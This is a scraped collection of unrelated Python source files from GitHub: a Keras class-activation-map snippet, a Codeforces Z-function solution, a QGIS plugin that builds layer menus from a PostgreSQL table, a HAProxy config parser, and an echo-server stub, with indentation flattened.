final_weights = self.classes_activation_scale[:, class_id]
final_maps = np.multiply(self.normalized_maps, final_weights.reshape((-1, 1, 1)))
# ReLU
final_maps_max = np.max(final_maps, axis=0)
final_class_activation_map = np.where(final_maps_max > 0, final_maps_max, 0)
return final_class_activation_map | andreysorokin/scam-net | scam/keras.py | keras.py | py | 3,075 | python | en | code | 9 | github-code | 36 |
74331703784 | '''
https://codeforces.com/problemset/problem/126/B
Solution: Compute array z as Z function of the string. Then we just need to find
an element z[i] such that z[i]=n-i and z[i]<max(z) or z[i]==max(z) and count(z[i])>=2
'''
def Z(s):
n=len(s)
z=[0 for i in range(n)]
l,r=0,0
for i in range(1,n):
if i>r:
l=r=i
while r<n and s[r-l]==s[r]:
r+=1
z[i]=r-l
r-=1
else:
k=i-l
if z[k]<r-i+1:
z[i]=z[k]
else:
l=i
while r<n and s[r-l]==s[r]:
r+=1
z[i]=r-l
r-=1
return z
s=input()
n=len(s)
z=Z(s)
m=max(z)
e=-float("inf")
count={i:0 for i in z}
for i in range(1,n):
if z[i]==n-i:
if z[i]<m or (z[i]==m and count[z[i]]>0):
e=max(z[i],e)
count[z[i]]+=1
if e!=-float("inf"):
print(s[-e:])
else:
print("Just a legend")
| codeblooded1729/Competitive-programming-Problems | codeforces/passsword.py | passsword.py | py | 995 | python | en | code | 0 | github-code | 36 |
23971685802 | from __future__ import unicode_literals
import os
import re
import json
from contextlib import contextmanager
from collections import defaultdict
from functools import wraps, partial
import psycopg2
from PyQt4.QtCore import Qt, QSettings, QRect
from PyQt4.QtGui import (
QIcon, QMessageBox, QDialog, QStandardItem, QMenu, QAction,
QStandardItemModel, QTreeView, QAbstractItemView,
QDockWidget, QWidget, QVBoxLayout, QSizePolicy,
QSortFilterProxyModel, QLineEdit, QDialogButtonBox
)
from qgis.core import (
QgsMapLayerRegistry, QgsBrowserModel, QgsDataSourceURI,
QgsCredentials, QgsVectorLayer, QgsMimeDataUtils, QgsRasterLayer
)
from menu_builder_dialog_base import Ui_Dialog
QGIS_MIMETYPE = 'application/x-vnd.qgis.qgis.uri'
ICON_MAPPER = {
'postgres': ":/plugins/MenuBuilder/resources/postgis.svg",
'WMS': ":/plugins/MenuBuilder/resources/wms.svg",
'WFS': ":/plugins/MenuBuilder/resources/wfs.svg",
'OWS': ":/plugins/MenuBuilder/resources/ows.svg",
'spatialite': ":/plugins/MenuBuilder/resources/spatialite.svg",
'mssql': ":/plugins/MenuBuilder/resources/mssql.svg",
'gdal': ":/plugins/MenuBuilder/resources/gdal.svg",
'ogr': ":/plugins/MenuBuilder/resources/ogr.svg",
}
class MenuBuilderDialog(QDialog, Ui_Dialog):
def __init__(self, uiparent):
super(MenuBuilderDialog, self).__init__()
self.setupUi(self)
# reference to caller
self.uiparent = uiparent
self.combo_profile.lineEdit().setPlaceholderText(self.tr("Profile name"))
# add icons
self.button_add_menu.setIcon(QIcon(":/plugins/MenuBuilder/resources/plus.svg"))
self.button_delete_profile.setIcon(QIcon(":/plugins/MenuBuilder/resources/delete.svg"))
# custom qtreeview
self.target = CustomQtTreeView(self)
self.target.setGeometry(QRect(440, 150, 371, 451))
self.target.setAcceptDrops(True)
self.target.setDragEnabled(True)
self.target.setDragDropMode(QAbstractItemView.DragDrop)
self.target.setObjectName("target")
self.target.setDropIndicatorShown(True)
self.target.setSelectionMode(QAbstractItemView.ExtendedSelection)
self.target.setHeaderHidden(True)
sizePolicy = QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.target.sizePolicy().hasHeightForWidth())
self.target.setSizePolicy(sizePolicy)
self.target.setAutoFillBackground(True)
self.verticalLayout_2.addWidget(self.target)
self.browser = QgsBrowserModel()
self.source.setModel(self.browser)
self.source.setHeaderHidden(True)
self.source.setDragEnabled(True)
self.source.setSelectionMode(QAbstractItemView.ExtendedSelection)
self.menumodel = MenuTreeModel(self)
self.target.setModel(self.menumodel)
self.target.setAnimated(True)
# add a dock widget
self.dock_widget = QDockWidget("Menus")
self.dock_widget.resize(400, 300)
self.dock_widget.setFloating(True)
self.dock_widget.setObjectName(self.tr("Menu Tree"))
self.dock_widget_content = QWidget()
self.dock_widget.setWidget(self.dock_widget_content)
dock_layout = QVBoxLayout()
self.dock_widget_content.setLayout(dock_layout)
self.dock_view = DockQtTreeView(self.dock_widget_content)
self.dock_view.setDragDropMode(QAbstractItemView.DragOnly)
self.dock_menu_filter = QLineEdit()
self.dock_menu_filter.setPlaceholderText(self.tr("Filter by table description (postgis only)"))
dock_layout.addWidget(self.dock_menu_filter)
dock_layout.addWidget(self.dock_view)
self.dock_view.setHeaderHidden(True)
self.dock_view.setDragEnabled(True)
self.dock_view.setSelectionMode(QAbstractItemView.ExtendedSelection)
self.dock_view.setAnimated(True)
self.dock_view.setObjectName("treeView")
self.proxy_model = LeafFilterProxyModel(self)
self.proxy_model.setFilterRole(Qt.ToolTipRole)
self.proxy_model.setFilterCaseSensitivity(Qt.CaseInsensitive)
self.profile_list = []
self.table = 'qgis_menubuilder_metadata'
self.layer_handler = {
'vector': self.load_vector,
'raster': self.load_raster
}
# connect signals and handlers
self.combo_database.activated.connect(partial(self.set_connection, dbname=None))
self.combo_schema.activated.connect(self.update_profile_list)
self.combo_profile.activated.connect(partial(self.update_model_idx, self.menumodel))
self.button_add_menu.released.connect(self.add_menu)
self.button_delete_profile.released.connect(self.delete_profile)
self.dock_menu_filter.textEdited.connect(self.filter_update)
self.dock_view.doubleClicked.connect(self.load_from_index)
self.buttonBox.rejected.connect(self.reject)
self.buttonBox.accepted.connect(self.accept)
self.buttonBox.button(QDialogButtonBox.Apply).clicked.connect(self.apply)
def filter_update(self):
text = self.dock_menu_filter.displayText()
self.proxy_model.setFilterRegExp(text)
def show_dock(self, state, profile=None, schema=None):
if not state:
# just hide widget
self.dock_widget.setVisible(state)
return
# dock must be read only and deepcopy of model is not supported (c++ inside!)
self.dock_model = MenuTreeModel(self)
if profile:
# bypass combobox
self.update_model(self.dock_model, schema, profile)
else:
self.update_model_idx(self.dock_model, self.combo_profile.currentIndex())
self.dock_model.setHorizontalHeaderLabels(["Menus"])
self.dock_view.setEditTriggers(QAbstractItemView.NoEditTriggers)
self.proxy_model.setSourceModel(self.dock_model)
self.dock_view.setModel(self.proxy_model)
self.dock_widget.setVisible(state)
def show_menus(self, state, profile=None, schema=None):
if state:
self.load_menus(profile=profile, schema=schema)
return
# remove menus
for menu in self.uiparent.menus:
self.uiparent.iface.mainWindow().menuBar().removeAction(menu.menuAction())
def add_menu(self):
"""
Add a menu inside qtreeview
"""
item = QStandardItem('NewMenu')
item.setIcon(QIcon(':/plugins/MenuBuilder/resources/menu.svg'))
# select current index selected and insert as a sibling
brother = self.target.selectedIndexes()
if not brother or not brother[0].parent():
# no selection, add menu at the top level
self.menumodel.insertRow(self.menumodel.rowCount(), item)
return
parent = self.menumodel.itemFromIndex(brother[0].parent())
if not parent:
self.menumodel.insertRow(self.menumodel.rowCount(), item)
return
parent.appendRow(item)
def update_database_list(self):
"""update list of defined postgres connections"""
settings = QSettings()
settings.beginGroup("/PostgreSQL/connections")
keys = settings.childGroups()
self.combo_database.clear()
self.combo_schema.clear()
self.menumodel.clear()
self.combo_database.addItems(keys)
self.combo_database.setCurrentIndex(-1)
settings.endGroup()
# clear profile list
self.combo_profile.clear()
self.combo_profile.setCurrentIndex(-1)
def set_connection(self, databaseidx, dbname=None):
"""
Connect to selected postgresql database
"""
selected = self.combo_database.itemText(databaseidx) or dbname
if not selected:
return
settings = QSettings()
settings.beginGroup("/PostgreSQL/connections/{}".format(selected))
if not settings.contains("database"):
# no entry?
QMessageBox.critical(self, "Error", "There is no defined database connection")
return
uri = QgsDataSourceURI()
settingsList = ["service", "host", "port", "database", "username", "password"]
service, host, port, database, username, password = map(
lambda x: settings.value(x, "", type=str), settingsList)
useEstimatedMetadata = settings.value("estimatedMetadata", False, type=bool)
sslmode = settings.value("sslmode", QgsDataSourceURI.SSLprefer, type=int)
settings.endGroup()
if service:
uri.setConnection(service, database, username, password, sslmode)
else:
uri.setConnection(host, port, database, username, password, sslmode)
uri.setUseEstimatedMetadata(useEstimatedMetadata)
# connect to db
self.connect_to_uri(uri)
# update schema list
self.update_schema_list()
@contextmanager
def transaction(self):
try:
yield
self.connection.commit()
except self.pg_error_types() as e:
self.connection.rollback()
raise e
def check_connected(func):
"""
Decorator that checks if a database connection is active before executing function
"""
@wraps(func)
def wrapped(inst, *args, **kwargs):
if not getattr(inst, 'connection', False):
QMessageBox(
QMessageBox.Warning,
"Menu Builder",
inst.tr("Not connected to any database, please select one"),
QMessageBox.Ok,
inst
).exec_()
return
if inst.connection.closed:
QMessageBox(
QMessageBox.Warning,
"Menu Builder",
inst.tr("Not connected to any database, please select one"),
QMessageBox.Ok,
inst
).exec_()
return
return func(inst, *args, **kwargs)
return wrapped
def connect_to_uri(self, uri):
self.close_connection()
self.host = uri.host() or os.environ.get('PGHOST')
self.port = uri.port() or os.environ.get('PGPORT')
username = uri.username() or os.environ.get('PGUSER') or os.environ.get('USER')
password = uri.password() or os.environ.get('PGPASSWORD')
try:
self.connection = psycopg2.connect(uri.connectionInfo())
except self.pg_error_types() as e:
err = str(e)
conninfo = uri.connectionInfo()
ok, username, password = QgsCredentials.instance().get(
conninfo, username, password, err)
if not ok:
raise Exception(e)
if username:
uri.setUsername(username)
if password:
uri.setPassword(password)
self.connection = psycopg2.connect(uri.connectionInfo())
self.pgencoding = self.connection.encoding
return True
def pg_error_types(self):
return (
psycopg2.InterfaceError,
psycopg2.OperationalError,
psycopg2.ProgrammingError
)
@check_connected
def update_schema_list(self):
self.combo_schema.clear()
with self.transaction():
cur = self.connection.cursor()
cur.execute("""
select nspname
from pg_namespace
where nspname not ilike 'pg_%'
and nspname not in ('pg_catalog', 'information_schema')
""")
schemas = [row[0] for row in cur.fetchall()]
self.combo_schema.addItems(schemas)
@check_connected
def update_profile_list(self, schemaidx):
"""
update profile list from database
"""
schema = self.combo_schema.itemText(schemaidx)
with self.transaction():
cur = self.connection.cursor()
cur.execute("""
select 1
from pg_tables
where schemaname = '{0}'
and tablename = '{1}'
union
select 1
from pg_matviews
where schemaname = '{0}'
and matviewname = '{1}'
""".format(schema, self.table))
tables = cur.fetchone()
if not tables:
box = QMessageBox(
QMessageBox.Warning,
"Menu Builder",
self.tr("Table '{}.{}' not found in this database, "
"would you like to create it now ?")
.format(schema, self.table),
QMessageBox.Cancel | QMessageBox.Yes,
self
)
ret = box.exec_()
if ret == QMessageBox.Cancel:
return False
elif ret == QMessageBox.Yes:
cur.execute("""
create table {}.{} (
id serial,
name varchar,
profile varchar,
model_index varchar,
datasource_uri text
)
""".format(schema, self.table))
self.connection.commit()
return False
cur.execute("""
select distinct(profile) from {}.{}
""".format(schema, self.table))
profiles = [row[0] for row in cur.fetchall()]
saved_profile = self.combo_profile.currentText()
self.combo_profile.clear()
self.combo_profile.addItems(profiles)
self.combo_profile.setCurrentIndex(self.combo_profile.findText(saved_profile))
@check_connected
def delete_profile(self):
"""
Delete profile currently selected
"""
idx = self.combo_profile.currentIndex()
schema = self.combo_schema.currentText()
profile = self.combo_profile.itemText(idx)
box = QMessageBox(
QMessageBox.Warning,
"Menu Builder",
self.tr("Delete '{}' profile ?").format(profile),
QMessageBox.Cancel | QMessageBox.Yes,
self
)
ret = box.exec_()
if ret == QMessageBox.Cancel:
return False
elif ret == QMessageBox.Yes:
self.combo_profile.removeItem(idx)
with self.transaction():
cur = self.connection.cursor()
cur.execute("""
delete from {}.{}
where profile = '{}'
""".format(schema, self.table, profile))
self.menumodel.clear()
self.combo_profile.setCurrentIndex(-1)
def update_model_idx(self, model, profile_index):
"""
wrapper that checks combobox
"""
profile = self.combo_profile.itemText(profile_index)
schema = self.combo_schema.currentText()
self.update_model(model, schema, profile)
def sortby_modelindex(self, rows):
return sorted(
rows,
key=lambda line: '/'.join(
['{:04}'.format(elem[0]) for elem in json.loads(line[2])]
))
@check_connected
def update_model(self, model, schema, profile):
"""
Update the model by retrieving the profile given in database
"""
menudict = {}
with self.transaction():
cur = self.connection.cursor()
select = """
select name, profile, model_index, datasource_uri
from {}.{}
where profile = '{}'
""".format(schema, self.table, profile)
cur.execute(select)
rows = cur.fetchall()
model.clear()
for name, profile, model_index, datasource_uri in self.sortby_modelindex(rows):
menu = model.invisibleRootItem()
indexes = json.loads(model_index)
parent = ''
for idx, subname in indexes[:-1]:
parent += '{}-{}/'.format(idx, subname)
if parent in menudict:
# already created entry
menu = menudict[parent]
continue
# create menu
item = QStandardItem(subname)
uri_struct = QgsMimeDataUtils.Uri(datasource_uri)
item.setData(uri_struct)
item.setIcon(QIcon(':/plugins/MenuBuilder/resources/menu.svg'))
item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsUserCheckable |
Qt.ItemIsEnabled | Qt.ItemIsDropEnabled |
Qt.ItemIsEditable)
item.setWhatsThis("menu")
menu.appendRow(item)
menudict[parent] = item
# set current menu to the new created item
menu = item
# add leaf (layer item)
item = QStandardItem(name)
uri_struct = QgsMimeDataUtils.Uri(datasource_uri)
# fix layer name instead of table name
# usefull when the layer has been renamed in menu
uri_struct.name = name
if uri_struct.providerKey in ICON_MAPPER:
item.setIcon(QIcon(ICON_MAPPER[uri_struct.providerKey]))
item.setData(uri_struct)
# avoid placing dragged layers on it
item.setDropEnabled(False)
if uri_struct.providerKey == 'postgres':
# set tooltip to postgres comment
comment = self.get_table_comment(uri_struct.uri)
item.setToolTip(comment)
menudict[parent].appendRow(item)
@check_connected
def save_changes(self, save_to_db=True):
"""
Save changes in the postgres table
"""
schema = self.combo_schema.currentText()
profile = self.combo_profile.currentText()
if not profile:
QMessageBox(
QMessageBox.Warning,
"Menu Builder",
self.tr("Profile cannot be empty"),
QMessageBox.Ok,
self
).exec_()
return False
if save_to_db:
try:
with self.transaction():
cur = self.connection.cursor()
cur.execute("delete from {}.{} where profile = '{}'".format(
schema, self.table, profile))
for item, data in self.target.iteritems():
if not data:
continue
cur.execute("""
insert into {}.{} (name,profile,model_index,datasource_uri)
values (%s, %s, %s, %s)
""".format(schema, self.table), (
item[-1][1],
profile,
json.dumps(item),
data.data())
)
except Exception as exc:
QMessageBox(
QMessageBox.Warning,
"Menu Builder",
exc.message.decode(self.pgencoding),
QMessageBox.Ok,
self
).exec_()
return False
self.save_session(
self.combo_database.currentText(),
schema,
profile,
self.activate_dock.isChecked(),
self.activate_menubar.isChecked()
)
self.update_profile_list(self.combo_schema.currentIndex())
self.show_dock(self.activate_dock.isChecked())
self.show_menus(self.activate_menubar.isChecked())
return True
@check_connected
def load_menus(self, profile=None, schema=None):
"""
Load menus in the main windows qgis bar
"""
if not schema:
schema = self.combo_schema.currentText()
if not profile:
profile = self.combo_profile.currentText()
# remove previous menus
for menu in self.uiparent.menus:
self.uiparent.iface.mainWindow().menuBar().removeAction(menu.menuAction())
with self.transaction():
cur = self.connection.cursor()
select = """
select name, profile, model_index, datasource_uri
from {}.{}
where profile = '{}'
""".format(schema, self.table, profile)
cur.execute(select)
rows = cur.fetchall()
# item accessor ex: '0-menu/0-submenu/1-item/'
menudict = {}
# reference to parent item
parent = ''
# reference to qgis main menu bar
menubar = self.uiparent.iface.mainWindow().menuBar()
for name, profile, model_index, datasource_uri in self.sortby_modelindex(rows):
uri_struct = QgsMimeDataUtils.Uri(datasource_uri)
indexes = json.loads(model_index)
# root menu
parent = '{}-{}/'.format(indexes[0][0], indexes[0][1])
if parent not in menudict:
menu = QMenu(self.uiparent.iface.mainWindow())
self.uiparent.menus.append(menu)
menu.setObjectName(indexes[0][1])
menu.setTitle(indexes[0][1])
menubar.insertMenu(
self.uiparent.iface.firstRightStandardMenu().menuAction(),
menu)
menudict[parent] = menu
else:
# menu already there
menu = menudict[parent]
for idx, subname in indexes[1:-1]:
# intermediate submenus
parent += '{}-{}/'.format(idx, subname)
if parent not in menudict:
submenu = menu.addMenu(subname)
submenu.setObjectName(subname)
submenu.setTitle(subname)
menu = submenu
# store it for later use
menudict[parent] = menu
continue
# already treated
menu = menudict[parent]
# last item = layer
layer = QAction(name, self.uiparent.iface.mainWindow())
if uri_struct.providerKey in ICON_MAPPER:
layer.setIcon(QIcon(ICON_MAPPER[uri_struct.providerKey]))
if uri_struct.providerKey == 'postgres':
# set tooltip to postgres comment
comment = self.get_table_comment(uri_struct.uri)
layer.setStatusTip(comment)
layer.setToolTip(comment)
layer.setData(uri_struct.uri)
layer.setWhatsThis(uri_struct.providerKey)
layer.triggered.connect(self.layer_handler[uri_struct.layerType])
menu.addAction(layer)
def get_table_comment(self, uri):
schema, table = re.match(r'.*table=(".*"\.".*")', uri) \
.group(1) \
.strip() \
.replace('"', '') \
.split('.')
with self.transaction():
cur = self.connection.cursor()
select = """
select description from pg_description
join pg_class on pg_description.objoid = pg_class.oid
join pg_namespace on pg_class.relnamespace = pg_namespace.oid
where relname = '{}' and nspname='{}'
""".format(table, schema)
cur.execute(select)
row = cur.fetchone()
if row:
return row[0]
return ''
def load_from_index(self, index):
"""Load layers from selected item index"""
item = self.dock_model.itemFromIndex(self.proxy_model.mapToSource(index))
if item.whatsThis() == 'menu':
return
if item.data().layerType == 'vector':
layer = QgsVectorLayer(
item.data().uri, # uri
item.text(), # layer name
item.data().providerKey # provider name
)
elif item.data().layerType == 'raster':
layer = QgsRasterLayer(
item.data().uri, # uri
item.text(), # layer name
item.data().providerKey # provider name
)
if not layer:
return
QgsMapLayerRegistry.instance().addMapLayer(layer)
def load_vector(self):
action = self.sender()
layer = QgsVectorLayer(
action.data(), # uri
action.text(), # layer name
action.whatsThis() # provider name
)
QgsMapLayerRegistry.instance().addMapLayer(layer)
def load_raster(self):
action = self.sender()
layer = QgsRasterLayer(
action.data(), # uri
action.text(), # layer name
action.whatsThis() # provider name
)
QgsMapLayerRegistry.instance().addMapLayer(layer)
def accept(self):
if self.save_changes():
QDialog.reject(self)
self.close_connection()
def apply(self):
if self.save_changes(save_to_db=False):
QDialog.reject(self)
def reject(self):
self.close_connection()
QDialog.reject(self)
def close_connection(self):
"""close current pg connection if exists"""
if getattr(self, 'connection', False):
if self.connection.closed:
return
self.connection.close()
def save_session(self, database, schema, profile, dock, menubar):
"""save current profile for next session"""
settings = QSettings()
settings.setValue("MenuBuilder/database", database)
settings.setValue("MenuBuilder/schema", schema)
settings.setValue("MenuBuilder/profile", profile)
settings.setValue("MenuBuilder/dock", dock)
settings.setValue("MenuBuilder/menubar", menubar)
def restore_session(self):
settings = QSettings()
database = settings.value("MenuBuilder/database", False)
schema = settings.value("MenuBuilder/schema", 'public')
profile = settings.value("MenuBuilder/profile", False)
dock = settings.value("MenuBuilder/dock", False)
menubar = settings.value("MenuBuilder/menubar", False)
if not any([database, profile]):
return
self.set_connection(0, dbname=database)
self.show_dock(bool(dock), profile=profile, schema=schema)
if bool(dock):
self.uiparent.iface.addDockWidget(Qt.LeftDockWidgetArea, self.dock_widget)
self.show_menus(bool(menubar), profile=profile, schema=schema)
class CustomQtTreeView(QTreeView):
def __init__(self, *args, **kwargs):
super(CustomQtTreeView, self).__init__(*args, **kwargs)
def dragMoveEvent(self, event):
event.acceptProposedAction()
def dragEnterEvent(self, event):
if not event.mimeData():
# don't drag menu entry
return False
# refuse if it's not a qgis mimetype
if event.mimeData().hasFormat(QGIS_MIMETYPE):
event.acceptProposedAction()
def keyPressEvent(self, event):
if event.key() == Qt.Key_Delete:
self.dropItem()
def dropItem(self):
model = self.selectionModel().model()
parents = defaultdict(list)
for idx in self.selectedIndexes():
parents[idx.parent()].append(idx)
for parent, idx_list in parents.items():
for diff, index in enumerate(idx_list):
model.removeRow(index.row() - diff, parent)
def iteritems(self, level=0):
"""
Dump model to store in database.
Generates each level recursively
"""
rowcount = self.model().rowCount()
for itemidx in range(rowcount):
# iterate over parents
parent = self.model().itemFromIndex(self.model().index(itemidx, 0))
for item, uri in self.traverse_tree(parent, []):
yield item, uri
def traverse_tree(self, parent, identifier):
"""
Iterate over childs, recursively
"""
identifier.append([parent.row(), parent.text()])
for row in range(parent.rowCount()):
child = parent.child(row)
if child.hasChildren():
# child is a menu ?
for item in self.traverse_tree(child, identifier):
yield item
identifier.pop()
else:
# add leaf
sibling = list(identifier)
sibling.append([child.row(), child.text()])
yield sibling, child.data()
class DockQtTreeView(CustomQtTreeView):
def __init__(self, *args, **kwargs):
super(DockQtTreeView, self).__init__(*args, **kwargs)
def keyPressEvent(self, event):
"""override keyevent to avoid deletion of items in the dock"""
pass
class MenuTreeModel(QStandardItemModel):
def __init__(self, *args, **kwargs):
super(MenuTreeModel, self).__init__(*args, **kwargs)
def dropMimeData(self, mimedata, action, row, column, parentIndex):
"""
Handles the dropping of an item onto the model.
De-serializes the data and inserts it into the model.
"""
# decode data using qgis helpers
uri_list = QgsMimeDataUtils.decodeUriList(mimedata)
if not uri_list:
return False
# find parent item
dropParent = self.itemFromIndex(parentIndex)
if not dropParent:
return False
# each uri will become a new item
for uri in uri_list:
item = QStandardItem(uri.name)
item.setData(uri)
# avoid placing dragged layers on it
item.setDropEnabled(False)
if uri.providerKey in ICON_MAPPER:
item.setIcon(QIcon(ICON_MAPPER[uri.providerKey]))
dropParent.appendRow(item)
dropParent.emitDataChanged()
return True
def mimeData(self, indexes):
"""
Used to serialize data
"""
if not indexes:
return
items = [self.itemFromIndex(idx) for idx in indexes]
if not items:
return
if not all(it.data() for it in items):
return
# reencode items
mimedata = QgsMimeDataUtils.encodeUriList([item.data() for item in items])
return mimedata
def mimeTypes(self):
return [QGIS_MIMETYPE]
def supportedDropActions(self):
return Qt.CopyAction | Qt.MoveAction
class LeafFilterProxyModel(QSortFilterProxyModel):
"""
Class to override the following behaviour:
If a parent item doesn't match the filter,
none of its children will be shown.
This Model matches items which are descendants
or ascendants of matching items.
"""
def filterAcceptsRow(self, row_num, source_parent):
"""Overriding the parent function"""
# Check if the current row matches
if self.filter_accepts_row_itself(row_num, source_parent):
return True
# Traverse up all the way to root and check if any of them match
if self.filter_accepts_any_parent(source_parent):
return True
# Finally, check if any of the children match
return self.has_accepted_children(row_num, source_parent)
def filter_accepts_row_itself(self, row_num, parent):
return super(LeafFilterProxyModel, self).filterAcceptsRow(row_num, parent)
def filter_accepts_any_parent(self, parent):
"""
Traverse to the root node and check if any of the
ancestors match the filter
"""
while parent.isValid():
if self.filter_accepts_row_itself(parent.row(), parent.parent()):
return True
parent = parent.parent()
return False
def has_accepted_children(self, row_num, parent):
"""
Starting from the current node as root, traverse all
the descendants and test if any of the children match
"""
model = self.sourceModel()
source_index = model.index(row_num, 0, parent)
children_count = model.rowCount(source_index)
for i in range(children_count):
if self.filterAcceptsRow(i, source_index):
return True
return False
| Oslandia/qgis-menu-builder | menu_builder_dialog.py | menu_builder_dialog.py | py | 32,979 | python | en | code | 2 | github-code | 36 |
26523812537 | #!/usr/bin/env python
# -*- coding: utf8 -*-
import os
import pyhaproxy.pegnode as pegnode
import pyhaproxy.config as config
class Parser(object):
"""Do parsing the peg-tree and build the objects in config module
Attributes:
filepath (str): the absolute path of haproxy config file
filestring (str): the content of haproxy config file
"""
def __init__(self, filepath='/etc/haproxy/haproxy.cfg', filestring=None):
if filestring:
self.filestring = filestring
elif filepath:
self.filestring = self.__read_string_from_file(filepath)
else:
raise Exception('please validate your input')
def build_configuration(self):
"""Parse the haproxy config file
Raises:
Exception: when there are unsupported section
Returns:
config.Configuration: haproxy config object
"""
configuration = config.Configuration()
pegtree = pegnode.parse(self.filestring)
for section_node in pegtree:
if isinstance(section_node, pegnode.GlobalSection):
configuration.globall = self.build_global(section_node)
elif isinstance(section_node, pegnode.FrontendSection):
configuration.frontends.append(
self.build_frontend(section_node))
elif isinstance(section_node, pegnode.DefaultsSection):
configuration.defaults.append(
self.build_defaults(section_node))
elif isinstance(section_node, pegnode.ListenSection):
configuration.listens.append(
self.build_listen(section_node))
elif isinstance(section_node, pegnode.UserlistSection):
configuration.userlists.append(
self.build_userlist(section_node))
elif isinstance(section_node, pegnode.BackendSection):
configuration.backends.append(
self.build_backend(section_node))
return configuration
def build_global(self, global_node):
"""parse `global` section, and return the config.Global
Args:
global_node (TreeNode): `global` section treenode
Returns:
config.Global: an object
"""
config_block_lines = self.__build_config_block(
global_node.config_block)
return config.Global(config_block=config_block_lines)
def __build_config_block(self, config_block_node):
"""parse `config_block` in each section
Args:
config_block_node (TreeNode): Description
Returns:
[line_node1, line_node2, ...]
"""
node_lists = []
for line_node in config_block_node:
if isinstance(line_node, pegnode.ConfigLine):
node_lists.append(self.__build_config(line_node))
elif isinstance(line_node, pegnode.OptionLine):
node_lists.append(self.__build_option(line_node))
elif isinstance(line_node, pegnode.ServerLine):
node_lists.append(
self.__build_server(line_node))
elif isinstance(line_node, pegnode.BindLine):
node_lists.append(
self.__build_bind(line_node))
elif isinstance(line_node, pegnode.AclLine):
node_lists.append(
self.__build_acl(line_node))
elif isinstance(line_node, pegnode.BackendLine):
node_lists.append(
self.__build_usebackend(line_node))
elif isinstance(line_node, pegnode.UserLine):
node_lists.append(
self.__build_user(line_node))
elif isinstance(line_node, pegnode.GroupLine):
node_lists.append(
self.__build_group(line_node))
else:
# may blank_line, comment_line
pass
return node_lists
def build_defaults(self, defaults_node):
"""parse `defaults` sections, and return a config.Defaults
Args:
defaults_node (TreeNode): Description
Returns:
config.Defaults: an object
"""
proxy_name = defaults_node.defaults_header.proxy_name.text
config_block_lines = self.__build_config_block(
defaults_node.config_block)
return config.Defaults(
name=proxy_name,
config_block=config_block_lines)
def build_userlist(self, userlist_node):
"""parse `userlist` sections, and return a config.Userlist"""
proxy_name = userlist_node.userlist_header.proxy_name.text
config_block_lines = self.__build_config_block(
userlist_node.config_block)
return config.Userlist(
name=proxy_name,
config_block=config_block_lines)
def build_listen(self, listen_node):
"""parse `listen` sections, and return a config.Listen
Args:
listen_node (TreeNode): Description
Returns:
config.Listen: an object
"""
proxy_name = listen_node.listen_header.proxy_name.text
service_address_node = listen_node.listen_header.service_address
# parse the config block
config_block_lines = self.__build_config_block(
listen_node.config_block)
# parse host and port
host, port = '', ''
if isinstance(service_address_node, pegnode.ServiceAddress):
host = service_address_node.host.text
port = service_address_node.port.text
else:
# use `bind` in config lines to fill in host and port
# just use the first
for line in config_block_lines:
if isinstance(line, config.Bind):
host, port = line.host, line.port
break
else:
raise Exception(
'Not specify host and port in `listen` definition')
return config.Listen(
name=proxy_name, host=host, port=port,
config_block=config_block_lines)
def build_frontend(self, frontend_node):
"""parse `frontend` sections, and return a config.Frontend
Args:
frontend_node (TreeNode): Description
Raises:
Exception: Description
Returns:
config.Frontend: an object
"""
proxy_name = frontend_node.frontend_header.proxy_name.text
service_address_node = frontend_node.frontend_header.service_address
# parse the config block
config_block_lines = self.__build_config_block(
frontend_node.config_block)
# parse host and port
host, port = '', ''
if isinstance(service_address_node, pegnode.ServiceAddress):
host = service_address_node.host.text
port = service_address_node.port.text
else:
# use `bind` in config lines to fill in host and port
# just use the first
for line in config_block_lines:
if isinstance(line, config.Bind):
host, port = line.host, line.port
break
else:
raise Exception(
'Not specify host and port in `frontend` definition')
return config.Frontend(
name=proxy_name, host=host, port=port,
config_block=config_block_lines)
def build_backend(self, backend_node):
"""parse `backend` sections
Args:
backend_node (TreeNode): Description
Returns:
config.Backend: an object
"""
proxy_name = backend_node.backend_header.proxy_name.text
config_block_lines = self.__build_config_block(
backend_node.config_block)
return config.Backend(name=proxy_name, config_block=config_block_lines)
def __build_server(self, server_node):
server_name = server_node.server_name.text
host = server_node.service_address.host.text
port = server_node.service_address.port.text
# parse server attributes, value is similar to \
# 'maxconn 1024 weight 3 check inter 2000 rise 2 fall 3'
server_attributes = server_node.value.text.split(' \t')
return config.Server(
name=server_name, host=host, port=port,
attributes=server_attributes)
def __build_config(self, config_node):
return config.Config(keyword=config_node.keyword.text,
value=config_node.value.text)
def __build_option(self, option_node):
return config.Option(keyword=option_node.keyword.text,
value=option_node.value.text)
def __build_bind(self, bind_node):
service_address = bind_node.service_address
return config.Bind(
host=service_address.host.text,
port=service_address.port.text,
attributes=bind_node.value.text.split(' \t'))
def __build_acl(self, acl_node):
acl_name = acl_node.acl_name.text
acl_value = acl_node.value.text
return config.Acl(name=acl_name, value=acl_value)
def __build_usebackend(self, usebackend_node):
operator = usebackend_node.operator.text
backendtype = usebackend_node.backendtype.text
return config.UseBackend(
backend_name=usebackend_node.backend_name.text,
operator=operator,
backend_condition=usebackend_node.backend_condition.text,
is_default=(backendtype == 'default_backend'))
def __build_user(self, user_node):
groups_fragment = user_node.groups_fragment.text
group_names = groups_fragment.split(',') if groups_fragment else []
return config.User(
name=user_node.user_name.text,
passwd=user_node.password.text,
passwd_type=user_node.passwd_type.text,
group_names=group_names)
def __build_group(self, group_node):
users_fragment = group_node.users_fragment.text
user_names = users_fragment.split(',') if users_fragment else []
return config.Group(
name=group_node.group_name.text,
user_names=user_names)
def __read_string_from_file(self, filepath):
filestring = ''
if os.path.exists(filepath):
with open(filepath) as f:
filestring = f.read()
return filestring
| imjoey/pyhaproxy | pyhaproxy/parse.py | parse.py | py | 10,541 | python | en | code | 53 | github-code | 36 |
5820967293 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Mar 6 18:28:13 2022
@author: ldd775
"""
import socket, sys, re, os
import params
def recBytes():
sys.path.append("../lib") # for params
switchesVarDefaults = (
(('-l', '--listenPort') ,'listenPort', 50001),
(('-?', '--usage'), "usage", False), # boolean (set if present)
)
progname = "echoserver"
paramMap = params.parseParams(switchesVarDefaults)
listenPort = paramMap['listenPort']
listenAddr = '' # Symbolic name meaning all available interfaces
if paramMap['usage']:
params.usage()
